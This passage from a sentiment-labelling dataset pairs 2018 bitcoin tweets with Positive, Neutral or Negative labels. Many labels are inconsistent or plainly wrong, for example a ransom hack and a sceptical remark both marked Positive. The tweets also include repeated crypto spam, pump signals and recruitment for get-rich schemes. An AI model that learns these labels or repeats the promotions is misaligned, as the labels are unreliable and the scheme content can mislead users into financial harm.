"Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC How much are they worth in bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Ginkgo_tree_Kr @rogerkver @Falkvinge Bitcoin is not a philosophy. BCH is not Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really look forward to bitcoin being large enough that these whales can't fuck with the price so much.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 4k by July \ud83e\udd11\ud83e\udd11\ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lil Bitcoin #newgenerationrapnames", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ELEC Pump detected, in 5 days we will see + 500% on this baby! Very hot inside news are coming! #bitcoin #altcoin #eth $eth $xmr $btc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp @coindesk Better bitcoin resource:", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitstein By this logic what is work?? Trading??? Every diehard hodler I know works to better bitcoin for free.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Since /r/buttcoin is actually one of the oldest bitcoin subs around we were in the top 3 I think for a few years", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nPlease send someone virtual currency\u3000\n#Bitcoin #VirtualCurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoinyuri @badger_coin Looks nice...makes me wanna buy some $BTC #Bitcoin !", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC (2932331 follows)\nThis couple loves bitcoin so much that they decided to have a bitcoin themed wedding. Most of their guests gave...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp Better bitcoin resource:", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8441.65 / 6851.665\u20ac\n1 bitcoin-cash = $970.165 / 787.434\u20ac\n1 ethereum = $515.2 / 418.162\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"We have elected to put our money and faith in a mathematical framework that is free of politics and human error.\" Tyler Winklevoss #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SommerRay do you like bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's hard to make a good TA in ALTS if the market is being moved by $btc. So, let's keep following The King. $btcusd $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nachdermas buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": ":( :( ....[Bitcoin performance assessment (-0.18%)] #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NoahRobertson01 glad i never bought into the bitcoin hype", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ever wanted to experiment with bitcoin? Send some to this address, yo:1BFaVmv91jmxSZDkiNedw1kt56m4X5bpRm", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is all of the beautiful poetry you read but failed to understand.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thealexwolfe @LockedOnKnicks You'd better run that ish like a bitcoin mining facility. It's like 0.00000:p000o.O0013 cents per stream... \ud83d\ude2d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83d\udcaf\ud83d\udcaf\ud83d\udcaf great dealEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@C1TY_0F_FL1NT @chadxenu @BigTiddiePolice You'll have to pay me 1 bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin next 1 hour high low range potential \n\nLow 8343 \nHigh 8623", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypt0snews Bitcoin can be wiped out if the authorities prove it as a counterfeit like a 3 dollar fake bill....", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really just sent 300 to the wrong bitcoin address.. wow.. fml", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DJSweetBrush @ericgeller Unless it's money laundering through Bitcoin. Could be anything, though lots of big names involved.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "DO-NOT short Bitcoin, you will get crushed\n\nSub 0.050 Eth/Btc is possible", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "IMHO bitcoin is the worst!! \ud83c\udf19", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin disini", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Moneto is a loan service, through which users can get real money on the security of Bitcoin and almost instantly.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MichaelMyers @Bitcoin @blockchain This feels like a reach.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MONETO will provide an opportunity to take a loan on the security of Bitcoin immediately, comfortably and reliably as possible.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Might be risky. But it is time to go long on #xbtusd. Go #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Including bitcoin/altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Old man yells at Bitcoin\" is exactly the same pattern as:\n\n\"The Church yells at Darwin for claiming that man was not created by god\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Snowden Post more bitcoin FUD please.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What does \"altcoin\" mean? $crypto #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "old: \"man, i wish i had bought bitcoin back then!\"\nnew: \"man, i wish i had sold bitcoin back then!\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BradyDale @coindesk @Snowden @blockstack @WolfieZhao I also think this as one of the biggest endorsements for Bitcoin indirectly", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Moneto will provide an opportunity to take a loan on the security of Bitcoin as quickly, conveniently and safely as possible.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8406 / \u20ac6816 / \u00a35956 @ Block 514758. \nMarket Cap: 145.52B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QuestForTori A Smart app that lets you mine for bitcoin while you order dominos", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Sicarious_ A trading tool for more Bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "A poet without love were a physical and metaphysical impossibility. #JohnKeats #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8458.96 / 6865.714\u20ac\n1 bitcoin-cash = $973.827 / 790.406\u20ac\n1 ethereum = $517.184 / 419.773\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ninthcompanion This is literally my thoughts exactly\n\nbut nah its a way to mine bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MONETO is a loan service, allowing users will be able to receive real money on the security of Bitcoin and almost immediately.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CandyHeartsBand fun fact: u can sell them on the black market in exchange for bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@joenatividad Uh oh. Hope you don\u2019t have to buy a new one. Damn bitcoin miners ruin everything", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What % of the time does fundamental \"FUD\" show up to justify a technical dump? #Bitcoin #Ethereum #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DonCryptoLife @CatoshiK @rogerkver Roger Ver was not associated with the creation of Bitcoin Cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8420.77", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto You're not trading it for Bitcoin now? \ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the #FlightToSafety #NoTariffs\n\n#bitcoin #litecoin #bitcoincash #investing #fintech #stockmarkets", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MaddowBlog @MSNBC right no the city of atlanta computer system has been Hacked and their asking for 51000 in bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "crazy thought: that guy who bought bitcoin at $0.08 and sold it at $0.30 made more money than anyone who bought in December", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@witsureisquick No bitcoin in existence can amount to the worth my followers are.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@shillycrypto Present: \"I wish I had sold Bitcoin right now!\"", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LeNuitRenard @LordRapt0rJesus @Dunnestar @ProfFaustus Do you hodl bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko Good, bad, indifferent, you\u2019re the only serious investor I know as bullish on bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dutch Court Finds Bitcoin A Legitimate \u201cTransferable Value\u201d: A Dutch court ruled BTC a \u201ctransferable value\u201d, which\u2026", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:53:03 2018 (20:51)\nUSD : 8393.36\nWght: 0.42\nBlk#: 514759\nSize: 1062.6 KB\nTXs: 2146\nPool: 96 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NotJustin11 Honestly have no clue how to get bitcoin \ud83d\ude02", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "look on youtube for the purchase of crypto#FLOGmall#blockchain#bitcoin#btc#etherum#ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:54:12 2018 (1:09)\nUSD : 8393.36\nWght: 0.42\nBlk#: 514760\nSize: 64.4 KB\nTXs: 129\nPool: 39 (0.0 MB)\n@dellisny\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sashandiggers @aantonop @farantzos LN is presumably a 100% trusted intermediary between Me and the Bitcoin Ledger", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CRInvestor @ErikSTownsend You know what he thinks about bitcoin right?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000110c6088b447cd0e9eca66d321b19218027aa5a2fba391 mined at height 514759.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000021c74f60ebbe8111e38b6a6d14b91d918ec68a9cab17f1 mined at height 514760.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000414d2134cf429c8a8ee667dbe1ff76a32ea809068114aa mined at height 514761.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 04:54:29 2018 (0:17)\nUSD : 8394.66\nWght: 0.42\nBlk#: 514761\nSize: 9.9 KB\nTXs: 26\nPool: 75 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WeTrustPlatform @el33th4xor Thanks! We are indeed the first #bitcoin nonprofit, est. 2013 \ud83d\ude4c\ud83c\udffe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "4661dbbb251658a2a2e9422ddd5eb7a1e189fb2532812454edb443b07e55beb9/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Ilovebitcoin because there are no legal issues with using #bitcoin everywhere", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@emcgillivray @ncweaver @random_walker Bitcoin is not equal to blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Although were #AdamSmith around today he might call it an #InvisibleVirtualHand.\n\n#cryptocurrency #blockchain #bitcoin $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "semangat mengumpulkan bitcoin, Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I feel like most of the stock drops are because of amerixan owned bitcoin owners though", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8419.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I think because of the law in america....it is definetly hurting american bitcoin owners compared to in eu vs korea", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30399.00000000 | BITCOIN(BLCHAIN) R$27878.6590054 | LITECOIN(MCDTBC) R$576.80000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "We need a bounce here or these next few weeks are gonna be ugly... $BTCUSD #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Which will launch first? $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8413.21 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,444.11, market cap of $142,996,569,692 (44.33%), and 24 hr vol. of $5,470,960,000 (37.57%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 09:00PM #Bitcoin Price:\nUSD 8671.55 | EUR 7036.48 | JPY 924287.55", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,442.21\nChange in 1h: -0.08%\nMarket cap: $142,964,183,134.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-NXT AskRate: 0.00001621 #Bittrex #NXT $NXT #NXT #altcoin #crypto #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#USD #bitcoin Index:\n 11894 satoshi\u2019s = $1\n #silver: 0.002 btc/oz", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.33% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,413.21, EUR 6,824.42", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8442.21\nEthereum:$516.396\nBitcoin Cash:$971.068\nLitecoin:$159.128\nRipple:$0.634595\nIOTA:$1.27617", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8444.11 / 6853.661\u20ac\n1 bitcoin-cash = $971.068 / 788.167\u20ac\n1 ethereum = $516.395 / 419.132\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 04:00 UTC Bitcoin Price: 8407.91 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Google will Create its Own Blockchain in the Future: Report #crypto #bitcoin #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8407.31/$8418.06 #Bitstamp\n$8407.77/$8413.40 #Kraken\n\u21e2$-10.29/$6.09\n$8360.00/$8444.03 #Coinbase\n\u21e2$-58.06/$36.72", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$27.5M; Support til $8200:$36.7M $BTC $BTCUSD #bitcoin #orderbook #markets #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003316 (+0.00000015) #BTC / 0.278311 (+0.00234) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8418.78 | -0.0029%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.048257 (+0.00011980) #BTC / 404.992 (+2.56100) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004594 (-0.00000023) #BTC / 0.385555 (-0.00044) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078344 (+0.00000327) #BTC / 6.57491 (+0.05265) #USD. Market rank is 6. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002250 (-0.00000008) #BTC / 0.18882 (+0.00003) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@harto So Russian hackers can use it's processor to mine bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "sse in medium for doubling for deposit#FLOGmall#blockchaun#bitcoin#btc#etherum#ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,411.65 v #BitcoinCash $966.57 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 13:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PapixSatoshi @nanocurrency If Bitcoin we're to crash and burn right now, every crypto would become worthless. Be careful what you wish for", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin price (USD): $8,413.21. Changed -299.68 USD since yesterday. Data last updated 15 minutes ago. #bitcoin #bitcoinprice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Binance Lists WanCoin ( $WAN ) #bitcoin #Bittrex #ethereum", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8418.82 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoGat When Bitcoin on Binance? It use a pumpy to prevent the dumpy you know \ud83d\ude1d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.33 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8418.82 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoGat When Bitcoin on Binance? It could use a pumpy to prevent the dumpy you know \ud83d\ude1d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of a #bitcoin is $8418.82. Have a nice day!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8418.82 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RT_com Hey dope, it\u2019s Costco.\n\nIt\u2019s Bitcoin.\n\nIt\u2019s Instant Pot.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8418.82", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin $BTC | $8,420 (-6.82%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 - please RT #BTCUSD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@taidi_ji How could Bitcoin absorb the value of a split window Corvette?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8444.11 Down -$0.76 -0.01% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sometimes you have to fight your friends harder than you do your enemies\ud83d\udd25\n\n#bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin and all is cool but have you invested in a person that turned out totally worthless.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Let's go for the last week see in medium#FLOGmall#blockchain#bitcoin#btc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@donlydacius @trumpthat_pussy @vj239 How do you feel about bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@krassenstein Bitcoin???????", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@smsportsguy @JoeFloccari @KariVanHorn Bitcoin is worth 10x what it was just a few years ago. I wouldn't call that tanking.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SilviuMajor everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@drumchode @hashflare and if u bought 10k worth of bitcoin in december ud lose money too", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JosinaAnderson everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@isiahxmartin everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$SANUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Stop_Trump20 everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Eu is probably the safest place for bitcoin farmers/owners due to the protection they have from the laws in eu", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.41 / 6853.093\u20ac\n1 bitcoin-cash = $973.852 / 790.426\u20ac\n1 ethereum = $518.39 / 420.751\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Provides Freedom, Says New PBoC Chief as China Opens Doors to $27 Trillion Payments Market #blockchain #hodl #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.444,110\n1 Hour: -0.05 % | 24 Hours: -6.82 % | 7 Days: 2.70 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "[05:11] #utrecht #Follow us for more #free #Bitcoin #information.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.71%, ($-5767.99) [Currently $8402.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8459.92", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kiddiebeatz @itzhel_s everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This is the perfect time to go long $BCD large. Go #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@leket11 @XPCBogdansky @adamludwin Why couldn\u2019t women have created bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "follow @MyBit_DApp. The next bitcoin.@marcelluswiley. Love your radio show since 2013 big homie.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Will be posting a $BTC #Bitcoin TA that I'm hoping will ease your worries.\n\nJust gimme a second.\n\n#Cryptocurrency \n#Blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kl_arnoldas Bitcoin always recovers, patience is required", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MrToxicCodes ?sooooo....its bitcoin?", "output": 